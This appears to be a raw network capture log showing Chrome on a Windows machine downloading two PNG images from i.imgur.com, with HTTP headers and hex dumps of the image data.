2025-03-24 09:13:02 UTC	1371	IN	Data Raw: de 7d fb f6 29 8a 02 1f 3f 00 a0 a1 03 bf 7e 18 f9 f5 d7 5f 6f bf fd f6 b3 67 cf 5a 2c 16 5a af d3 da 5d 92 24 9b cd a6 b1 bb cf 1c e7 f4 20 21 21 a1 57 af 5e 2b 57 ae b4 d9 6c fa 9e 41 83 27 64 1f bf 24 49 34 45 a3 5a fd 34 f7 1a 37 6e dc d8 b1 63 d5 7b fc 55 d3 36 01 00 20 92 81 25 a9 8e 61 8b f8 8d 1b 37 0e 1b 36 ec ec d9 b3 a4 3d 34 bb 12 45 91 84 87 49 3e 2b a7 4f e9 7b 1c c7 31 3b 7e 42 42 02 3d b8 f3 ce 3b 21 f9 a1 51 93 8f 9f 59 f6 09 da 55 61 fa 5d 5e 5e ce ea 28 78 3c 1e f6 9d be f6 da 6b 23 47 8e 3c 72 e4 08 fd 29 08 02 24 1f 00 d0 b0 40 84 bf 2e 51 14 85 dc f6 bb 76 ed 9a 31 63 c6 fa f5 eb 2d 16 8b 76 8d 17 16 6b 61 f6 3c 2a ba 27 cb b2 c7 e3 31 9b cd 4f 3e f9 e4 c8 91 23 11 58 0e 19 f2 f1 cb b2 bc 77 ef 5e b7 db 6d b7 db 5d 2e 97 db ed 66 33 Data Ascii: })?~_ogZ,Z]$ !!W^+WlA'd$I4EZ47nc{U6 %a76=4EI>+O{1;~BB=;!QYUa]^^(x<k#G<r)$@.Qv1c-vka<*'1O>#Xw^m].f3
2025-03-24 09:13:02 UTC	1371	IN	Data Raw: 7e f8 e1 a1 87 1e ca cb cb a3 4b ba ac ac 4c 96 65 9e e7 99 c3 48 92 24 9f cf 47 9e 94 a2 a2 a2 23 47 8e dc 73 cf 3d f5 3d 70 10 5e a0 fa a1 40 92 ff eb af bf 4e 99 32 e5 f0 e1 c3 d4 2f a7 b6 6e 08 12 92 c7 1e 7b 6c c6 8c 19 b4 59 00 c9 d7 19 b5 8f bf 7b f7 ee 65 65 65 db b7 6f af ad 8f df 64 32 09 82 a0 f6 f1 53 3f 7e f8 f8 41 fd b2 7c f9 f2 91 23 47 16 14 14 50 6b 69 ba e1 a8 a7 b0 74 db 61 7d a4 14 45 39 78 f0 e0 ed b7 df de a4 49 93 7a 1d 38 08 2f 50 fd 5a 43 e1 fd a2 a2 a2 59 b3 66 ad 5e bd 3a 98 ce ad d5 62 b1 58 ee bd f7 de 09 13 26 20 1a 5c bf d0 8e 7e 72 72 72 68 3e 7e 93 c9 44 0d 96 d4 3e fe 9c 9c 1c ea c7 0f 1f 3f d0 1f bf df bf 6c d9 b2 b9 73 e7 ee dd bb 97 d5 0e b1 58 2c 0e 87 83 1e 3b 9d 4e 8a 35 92 9f 85 2e 60 45 51 44 51 6c d4 a8 51 bf 7e Data Ascii: ~KLeH$G#Gs==p^@N2/n{lY{eeeod2S?~A\|#GPkita}E9xIz8/PZCYf^:bX& \~rrrh>~D>?lsX,;N5.`EQDQlQ~
2025-03-24 09:13:02 UTC	1371	IN	Data Raw: 6a fd e6 9b 6f d8 ce 3d 68 88 f8 fd 7e 56 a2 3c 21 21 81 1e b0 0a 3f 44 25 1f bf 06 c3 86 0d a3 8f ad a8 a8 a8 ef 33 03 0d 92 a5 4b 97 a6 a7 a7 53 05 1e 8d 2b 8d 5d a2 64 3d 65 8f 0d 06 43 62 62 22 bd da ae 5d bb e5 cb 97 d7 f7 09 01 9d 40 84 3f 00 54 63 67 e5 ca 95 9f 7f fe 39 f9 f4 6a 82 b5 cd 65 6d 2d 98 cb 6b e4 c8 91 0f 3f fc b0 d5 6a 85 71 ab e1 c2 f3 7c cb 96 2d 65 59 56 f7 e3 77 bb dd b5 ed c7 4f 1c 3b 76 4c 92 a4 bf fd ed 6f b4 4f 84 fd 1d 50 2b 96 2e 5d 3a 6d da b4 c3 87 0f 07 ac f3 a1 76 99 b2 c7 1c c7 c5 c7 c7 9f 3f 7f 5e 96 e5 ac ac ac d1 a3 47 df 7d f7 dd b8 08 63 85 fa 9e 76 44 34 1e 8f 47 51 94 bc bc bc 9b 6f be 99 fe 77 69 af f5 69 e2 4c 3d 57 d8 cc ba 53 a7 4e c7 8e 1d ab ef 53 01 75 c3 a1 43 87 fe eb bf fe 8b be 6e 5a 63 31 81 57 5f 1b Data Ascii: jo=h~V<!!?D%3KS+]d=eCbb"]@?Tcg9jem-k?jq\|-eYVwO;vLoOP+.]:mv?^G}cvD4GQowiiL=WSNSuCnZc1W_
2025-03-24 09:13:02 UTC	1371	IN	Data Raw: be 42 20 a1 3a 36 81 2f 1f 84 15 a8 fe 5f a0 9b f5 d9 b3 67 3f f9 e4 13 ba e7 32 87 2b 9b 44 6b 7f c2 ed b7 df 7e fd f5 d7 ab df 08 a2 1e ea 9a 68 30 18 2e bd f4 d2 71 e3 c6 5d 77 dd 75 21 7c 88 d9 6c ce cb cb 5b b7 6e 5d 18 06 08 1a 12 a1 f5 cb 57 d7 d8 67 21 81 b4 b4 b4 99 33 67 3e f8 e0 83 f4 a7 28 8a 54 6d 0c 61 a4 58 06 aa ff 17 28 b8 fa d5 57 5f 9d 3c 79 92 04 5e dd 4f 5d bb 59 b5 28 8a 8d 1a 35 7a f0 c1 07 69 4a ae ee a3 0f a2 1b 8e e3 58 06 f5 35 d7 5c f3 d0 43 0f a5 a4 a4 d4 f6 43 28 ee fa d5 57 5f 51 55 47 10 83 c0 97 0f 74 00 aa ff 27 14 d2 17 45 71 e5 ca 95 ec c7 43 6d 2a 58 b1 55 ed 39 72 87 0e 1d ae bd f6 5a 0a a3 e9 38 70 50 9f b0 4b 42 10 04 7a 7c d7 5d 77 3d fc f0 c3 b5 fd 1c 59 96 39 8e db b0 61 03 25 6c 83 18 04 be 7c a0 03 50 fd 3f a1 Data Ascii: B :6/_g?2+Dk~h0.q]wu!\|l[n]Wg!3g>(TmaX(W_<y^O]Y(5ziJX5\CC(W_QUGt'EqCm*XU9rZ8pPKBz\|]w=Y9a%l\|P?
2025-03-24 09:13:02 UTC	1371	IN	Data Raw: d0 a0 81 03 07 d2 f3 f0 e5 83 d0 80 ea 1b 28 81 bf 56 de 2a fa 8d 25 24 24 b4 6d db 56 97 01 82 86 8a cf e7 a3 1b 7d 90 f7 65 3a 8c f6 71 c3 3f 3a 10 5e c8 97 bf 7f ff fe b8 b8 38 ca c2 a3 1a ba e4 cb b7 5a ad 54 e6 ab 26 e8 56 c3 56 f9 83 06 0d 1a 3e 7c 38 7b 95 f9 f2 65 59 46 f3 5c 10 3c b8 b3 18 dc 6e 37 f5 d9 a3 1b 6e c0 58 19 a5 ee 1b 0c 86 e1 c3 87 23 b0 06 b4 d9 bb 77 2f b3 60 49 92 a4 a1 e5 14 ec 95 24 89 dc 59 8d 1b 37 d6 77 a4 a1 a0 2d 5a 31 0e f5 cb df bf 7f bf c3 e1 20 c9 af b6 5f 3e 05 17 ab 9d ea c5 c5 c5 91 ea b7 6f df fe bd f7 de 53 4b 3e 03 fd f2 41 6d c1 5a df 70 e8 d0 21 8a b6 a9 db ea 68 37 e0 a1 fb 78 46 46 06 02 6b 40 9b 9c 9c 1c 75 8a b5 46 e5 47 36 83 54 14 25 35 35 55 c7 31 d6 1a 3a 05 ab d5 4a b9 e8 f9 f9 f9 a7 4f 9f 3e 7e fc b8 Data Ascii: (V*%$$mV}e:q?:^8ZT&VV>\|8{eYF\<n7nX#w/`I$Y7w-Z1 _>oSK>AmZp!h7xFFk@uFG6T%55U1:JO>~
2025-03-24 09:13:02 UTC	1371	IN	Data Raw: fa 6a ba ef 87 61 74 b5 a3 ea 52 9e 54 9f e7 79 a3 d1 58 ab 8e c0 91 70 3a 75 88 20 08 6b d7 ae 7d e6 99 67 76 ef de 5d c9 97 af fd 46 b5 2f 9f 24 5f 51 94 aa be 7c 48 3e 08 2b 31 ad fa 05 05 05 da 5b 71 d5 92 96 96 96 98 98 18 9e 11 81 06 cc f6 ed db 47 8d 1a f5 d3 4f 3f 71 1c 17 da ea f6 96 5b 6e c9 cc cc 0c c3 d0 ea 0c 2a bb 4b 45 87 aa 0d 59 57 4b 30 db ff 0d 08 f8 f2 41 83 26 a6 27 95 05 05 05 21 dc 8f d0 5d 17 54 65 d7 ae 5d 2f bf fc f2 f7 df 7f 4f 2d 98 43 88 21 b5 6e dd fa 9e 7b ee 21 d9 88 cc d5 5e a5 08 7f 90 92 1f 4d 84 a3 5f fe 5d 77 dd 45 cf c3 97 0f f4 21 76 af 2d 49 92 42 b8 35 1b 0c 86 66 cd 9a 85 61 38 a0 01 93 97 97 37 65 ca 94 65 cb 96 51 f0 b6 a4 a4 24 84 e2 f3 dd ba 75 23 47 a8 76 ad fe fa 85 75 ac a8 94 8b ae 31 4d 89 26 cf 1e 7c f9 Data Ascii: jatRTyXp:u k}gv]F/$_Q\|H>+1[qGO?q[n*KEYWK0A&'!]Te]/O-C!n{!^M_]wE!v-IB5fa87eeQ$u#Gvu1M&\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	199.232.192.193	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:13:03 UTC	386	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:13:03 UTC	756	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Mon, 24 Mar 2025 09:13:03 GMT Age: 2510640 X-Served-By: cache-iad-kiad7000021-IAD, cache-lga21989-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 11253, 1 X-Timer: S1742807583.267029,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-24 09:13:03 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-03-24 09:13:03 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-03-24 09:13:03 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-03-24 09:13:03 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-03-24 09:13:03 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	199.232.192.193	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:13:03 UTC	386	OUT	GET /KAb5SEy.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:13:03 UTC	757	IN	HTTP/1.1 200 OK Connection: close Content-Length: 48869 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 13:35:05 GMT ETag: "8aa14660517f5460156fccc2199cf83c" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: ZMDtIIYNSizYrfDVWXb5ZuJtkSbNLszxoUAHUCL9zZz9IlMMufkJOg== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Mon, 24 Mar 2025 09:13:03 GMT Age: 2559656 X-Served-By: cache-iad-kjyo7100129-IAD, cache-lga21977-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 14884, 1 X-Timer: S1742807583.265412,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-24 09:13:03 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a7 00 00 02 3e 08 02 00 00 00 0e ee 34 d8 00 00 80 00 49 44 41 54 78 9c ec bd 77 7c 14 e5 da ff bf b3 b3 7d 37 3d 10 0c 3d 94 50 42 11 54 10 8f 22 d6 a3 1e 45 e4 b1 60 45 54 1e 11 45 ba 22 52 45 a4 89 05 eb 51 44 fd 3e 3e a8 14 c1 47 39 08 7a 10 14 50 94 5e 12 6a 28 21 04 48 48 48 d9 36 ed f7 3a 5c fe 6e c7 94 d9 cd 92 9d 6c 76 3f ef 3f 7c 6d 76 67 97 7b dc d9 f9 dc f7 75 5f 9f eb 32 29 8a 62 00 00 00 00 40 0c 60 ac ef 01 00 00 00 00 40 27 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 01 aa 0f 00 00 00 c4 0a 50 7d 00 00 00 20 56 80 ea 03 00 00 00 b1 02 54 1f 00 00 00 88 15 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 Data Ascii: PNGIHDR>4IDATxw\|}7==PBT"E`ETE"REQD>>G9zP^j(!HHH6:\nlv??\|mvg{u_2)b@`@'@b>+@XP} VT@b>+@X
2025-03-24 09:13:03 UTC	1371	IN	Data Raw: 95 de 05 00 00 20 34 f8 a9 53 a7 d6 f7 18 40 1d 50 a9 2c 2e 7b 92 64 d8 ef f7 7f f0 c1 07 6f bf fd f6 91 23 47 2e fe df a2 cf ac a9 05 1f 1d 40 35 79 68 f6 c0 f3 bc c5 62 a9 6d 96 80 d9 6c 16 45 f1 d4 a9 53 1e 8f 27 23 23 23 35 35 d5 68 34 92 2b e1 e2 4f 01 00 00 62 13 44 f8 1b 3c b4 94 67 02 4c 79 fb a4 8e 24 90 a2 28 2e 58 b0 60 ee dc b9 a7 4e 9d ba 98 7f a8 da 9d 7e b5 47 40 7d 24 2b d3 1b f2 05 46 19 00 b4 0b f0 d8 63 8f 8d 1f 3f 1e 8e 3e 00 00 b8 48 a0 fa 51 8e db ed 9e 33 67 ce 82 05 0b ce 9d 3b 47 4b f0 da c6 c9 d5 95 74 6b 82 2d fd 69 7b be ea 4b 3c cf 57 7a 3e 18 58 8e a1 cd 66 7b e0 81 07 46 8e 1c 99 95 95 55 db 0f 01 00 00 c0 40 84 3f 4a 10 04 81 a5 eb b3 75 7f 41 41 c1 dc b9 73 17 2c 58 50 52 52 62 32 99 ec 76 bb cf e7 ab ed 27 b3 d5 3c fd 49 Data Ascii: 4S@P,.{do#G.@5yhbmlES'###55h4+ObD<gLy$(.X`N~G@}$+Fc?>HQ3g;GKtk-i{K<Wz>Xf{FU@?JuAAs,XPRRb2v'<I
2025-03-24 09:13:03 UTC	1371	IN	Data Raw: 15 15 15 4c ec 03 a6 22 32 1f 3f 1d 4c 66 01 83 c1 30 7a f4 e8 f1 e3 c7 a7 a5 a5 85 6f c0 00 00 d0 a0 81 ea 47 1c 14 ee 0e 78 d8 a2 45 8b c6 8c 19 53 5c 5c 1c c2 3f c1 8a dd 5a ad 56 9f cf c7 71 5c db b6 6d 37 6e dc 18 17 17 67 b3 d9 2a 25 de 87 1b 51 14 1f 79 e4 91 ff fd df ff 25 39 3f 7f fe 7c b5 c2 1f 8c 8f df 6c 36 0f 1c 38 70 da b4 69 e4 33 84 9d 0f 00 00 2a 81 08 7f c4 11 8c dc 2e 5c b8 70 fa f4 e9 05 05 05 54 0a b7 b6 9f 4f 85 71 52 52 52 68 b9 7c e7 9d 77 fe f3 9f ff 6c d2 a4 09 49 be 7a 27 5e dd cb 27 4c 18 8d c6 56 ad 5a 71 1c 97 9d 9d 5d 5e 5e 6e b5 5a 5d 2e 97 db ed b6 58 2c ea 7f 9d 02 fb 26 93 a9 a6 3a 04 e4 e3 3f 79 f2 a4 ba 1f 3f 6b 4a 04 00 00 00 aa df 90 20 09 14 45 f1 bd f7 de 9b 3c 79 72 7e 7e be d9 6c 0e c1 94 4f da 69 b3 d9 4a 4b 4b Data Ascii: L"2?Lf0zoGxES\\?ZVq\m7ng%Qy%9?\|l68pi3.\pTOqRRRh\|wlIz'^'LVZq]^^nZ].X,&:?y?kJ E<yr~~lOiJKK
2025-03-24 09:13:03 UTC	1371	IN	Data Raw: ab 55 c7 53 a9 4b a8 83 0e f9 f8 3d 1e cf d1 a3 47 7d 3e 1f 2d f4 59 25 c1 9a 36 f5 69 cb 9f 22 25 54 9e 48 14 45 af d7 0b 1f 3f 00 20 36 81 73 2f 52 c8 cb cb 9b 32 65 ca 47 1f 7d 44 5e 3b e1 02 06 83 21 2e 2e 4e 14 45 ed 7d 7d 52 7d 52 3e 2a 64 6b 36 9b 37 6e dc d8 b5 6b 57 1d cf 40 0f 3c 1e cf 8d 37 de b8 7d fb 76 b7 db cd f3 3c c9 79 40 1f bf c3 e1 50 14 85 fe 1f da 6c 36 56 d9 10 3e 7e 00 40 ac d1 90 12 bb 1a 28 1a cb 50 b6 7c cf ce ce 1e 39 72 e4 a2 45 8b e8 4f b7 db cd 5e 2a 2b 2b 23 b9 aa 94 9f cf 48 48 48 20 f7 5a 7c 7c 3c 6d ed f7 ee dd fb b7 df 7e 8b 3e c9 a7 3a 45 1b 36 6c e8 df bf 3f ed 59 24 24 24 50 be 82 c5 62 a9 94 a5 68 34 1a d9 8e 86 db ed 66 d3 26 af d7 cb be 91 05 0b 16 8c 1e 3d fa d0 a1 43 f4 67 08 e5 8d 01 00 a0 61 81 08 7f d8 d1 b0 Data Ascii: USK=G}>-Y%6i"%THE? 6s/R2eG}D^;!..NE}}R}R>dk67nkW@<7}v<y@Pl6V>~@(P\|9rEO^++#HHH Z\|\|<m~>:E6l?Y$$$Pbh4f&=Cga
2025-03-24 09:13:03 UTC	1371	IN	Data Raw: de 7d fb f6 29 8a 02 1f 3f 00 a0 a1 03 bf 7e 18 f9 f5 d7 5f 6f bf fd f6 b3 67 cf 5a 2c 16 5a af d3 da 5d 92 24 9b cd a6 b1 bb cf 1c e7 f4 20 21 21 a1 57 af 5e 2b 57 ae b4 d9 6c fa 9e 41 83 27 64 1f bf 24 49 34 45 a3 5a fd 34 f7 1a 37 6e dc d8 b1 63 d5 7b fc 55 d3 36 01 00 20 92 81 25 a9 8e 61 8b f8 8d 1b 37 0e 1b 36 ec ec d9 b3 a4 3d 34 bb 12 45 91 84 87 49 3e 2b a7 4f e9 7b 1c c7 31 3b 7e 42 42 02 3d b8 f3 ce 3b 21 f9 a1 51 93 8f 9f 59 f6 09 da 55 61 fa 5d 5e 5e ce ea 28 78 3c 1e f6 9d be f6 da 6b 23 47 8e 3c 72 e4 08 fd 29 08 02 24 1f 00 d0 b0 40 84 bf 2e 51 14 85 dc f6 bb 76 ed 9a 31 63 c6 fa f5 eb 2d 16 8b 76 8d 17 16 6b 61 f6 3c 2a ba 27 cb b2 c7 e3 31 9b cd 4f 3e f9 e4 c8 91 23 11 58 0e 19 f2 f1 cb b2 bc 77 ef 5e b7 db 6d b7 db 5d 2e 97 db ed 66 33 Data Ascii: })?~_ogZ,Z]$ !!W^+WlA'd$I4EZ47nc{U6 %a76=4EI>+O{1;~BB=;!QYUa]^^(x<k#G<r)$@.Qv1c-vka<*'1O>#Xw^m].f3
2025-03-24 09:13:03 UTC	1371	IN	Data Raw: 7e f8 e1 a1 87 1e ca cb cb a3 4b ba ac ac 4c 96 65 9e e7 99 c3 48 92 24 9f cf 47 9e 94 a2 a2 a2 23 47 8e dc 73 cf 3d f5 3d 70 10 5e a0 fa a1 40 92 ff eb af bf 4e 99 32 e5 f0 e1 c3 d4 2f a7 b6 6e 08 12 92 c7 1e 7b 6c c6 8c 19 b4 59 00 c9 d7 19 b5 8f bf 7b f7 ee 65 65 65 db b7 6f af ad 8f df 64 32 09 82 a0 f6 f1 53 3f 7e f8 f8 41 fd b2 7c f9 f2 91 23 47 16 14 14 50 6b 69 ba e1 a8 a7 b0 74 db 61 7d a4 14 45 39 78 f0 e0 ed b7 df de a4 49 93 7a 1d 38 08 2f 50 fd 5a 43 e1 fd a2 a2 a2 59 b3 66 ad 5e bd 3a 98 ce ad d5 62 b1 58 ee bd f7 de 09 13 26 20 1a 5c bf d0 8e 7e 72 72 72 68 3e 7e 93 c9 44 0d 96 d4 3e fe 9c 9c 1c ea c7 0f 1f 3f d0 1f bf df bf 6c d9 b2 b9 73 e7 ee dd bb 97 d5 0e b1 58 2c 0e 87 83 1e 3b 9d 4e 8a 35 92 9f 85 2e 60 45 51 44 51 6c d4 a8 51 bf 7e Data Ascii: ~KLeH$G#Gs==p^@N2/n{lY{eeeod2S?~A\|#GPkita}E9xIz8/PZCYf^:bX& \~rrrh>~D>?lsX,;N5.`EQDQlQ~
2025-03-24 09:13:03 UTC	1371	IN	Data Raw: 6a fd e6 9b 6f d8 ce 3d 68 88 f8 fd 7e 56 a2 3c 21 21 81 1e b0 0a 3f 44 25 1f bf 06 c3 86 0d a3 8f ad a8 a8 a8 ef 33 03 0d 92 a5 4b 97 a6 a7 a7 53 05 1e 8d 2b 8d 5d a2 64 3d 65 8f 0d 06 43 62 62 22 bd da ae 5d bb e5 cb 97 d7 f7 09 01 9d 40 84 3f 00 54 63 67 e5 ca 95 9f 7f fe 39 f9 f4 6a 82 b5 cd 65 6d 2d 98 cb 6b e4 c8 91 0f 3f fc b0 d5 6a 85 71 ab e1 c2 f3 7c cb 96 2d 65 59 56 f7 e3 77 bb dd b5 ed c7 4f 1c 3b 76 4c 92 a4 bf fd ed 6f b4 4f 84 fd 1d 50 2b 96 2e 5d 3a 6d da b4 c3 87 0f 07 ac f3 a1 76 99 b2 c7 1c c7 c5 c7 c7 9f 3f 7f 5e 96 e5 ac ac ac d1 a3 47 df 7d f7 dd b8 08 63 85 fa 9e 76 44 34 1e 8f 47 51 94 bc bc bc 9b 6f be 99 fe 77 69 af f5 69 e2 4c 3d 57 d8 cc ba 53 a7 4e c7 8e 1d ab ef 53 01 75 c3 a1 43 87 fe eb bf fe 8b be 6e 5a 63 31 81 57 5f 1b Data Ascii: jo=h~V<!!?D%3KS+]d=eCbb"]@?Tcg9jem-k?jq\|-eYVwO;vLoOP+.]:mv?^G}cvD4GQowiiL=WSNSuCnZc1W_
